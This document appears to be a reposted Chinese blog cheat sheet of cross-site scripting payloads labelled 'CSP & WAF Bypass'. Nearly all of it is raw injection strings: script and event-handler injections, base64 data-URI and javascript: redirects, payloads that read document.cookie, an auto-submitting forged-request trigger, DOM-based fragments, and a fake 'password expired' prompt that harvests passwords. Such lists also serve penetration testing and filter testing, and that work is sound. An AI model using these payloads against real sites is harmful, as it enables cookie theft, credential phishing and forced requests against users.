CSP & WAF Bypass
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh> <svg </onload ="1> (_=alert,_(1337)) ""> <img οnerrοr=alert(1) src <u></u>
重定向 攻击代码:
';redirecturl='javascript:alert("XSS") ';redirecturl='http://google.com/'
Example: www.xyz.com?q="XSS Script"
"/>alert("Xss:Priyanshu") "/></script><script>alert(/XSS : Priyanshu/)</script> <body οnlοad=alert(1)> "<body οnlοad="alert('XSS by Priyanshu')"> "></style</script><script>confirm("XSS By Priyanshu")</script> <body οnlοad=document.getElementById("xsrf").submit()> <a href="data:text/html;based64_,<svg/οnlοad=\u0061l&101rt(1)>">X</a <a href="data:text/html;based64_,<svg/οnlοad=\u0061l&101rt(document.cookie)>">X</a http://test.com<script>alert(document.domain)</script> http://test.com<script>alert(document.cookie)</script> <img src=x οnerrοr=alert(document.domain)> x"></script><img src=x οnerrοr=alert(1)> q=" οnclick="alert(/XSS/) "><iframe src='javascript:prompt(/XSS/);'> <iframe src="http://google.com"></iframe> "><iframe src=a οnlοad=alert('XSS')< </script><script>alert(document.cookie)</script> <xss>alert('xss')</xss> <iframe src="http://google.com"></iframe> DOM Based XSS Scripts /default.aspx#"><img src=x οnerrοr=prompt('XSS');> /default.aspx#"><img src=x οnerrοr=prompt('0');> <img src=x οnerrοr=prompt(1);> by "> “><img src=x οnerrοr=prompt(0)>.txt.jpg “><img src=x οnerrοr=alert(document.cookie)> "><img src=x οnerrοr=prompt(1);> "><script>alert('XSS')</script> id=abc"><Script>alert(/xss/)</SCRIPT> "><img src=" " onMouseover=prompt(/xss/);> Default.aspx/" οnmοuseοut="confirm(1)'x="
http://localhost/test.php?title=TITLE</title><script>var a = prompt('密码已经过期,请重新输入密码');alert(a);</script>
转载于:https://www.cnblogs.com/ssooking/p/6542333.html
相关资源:XSS攻击检测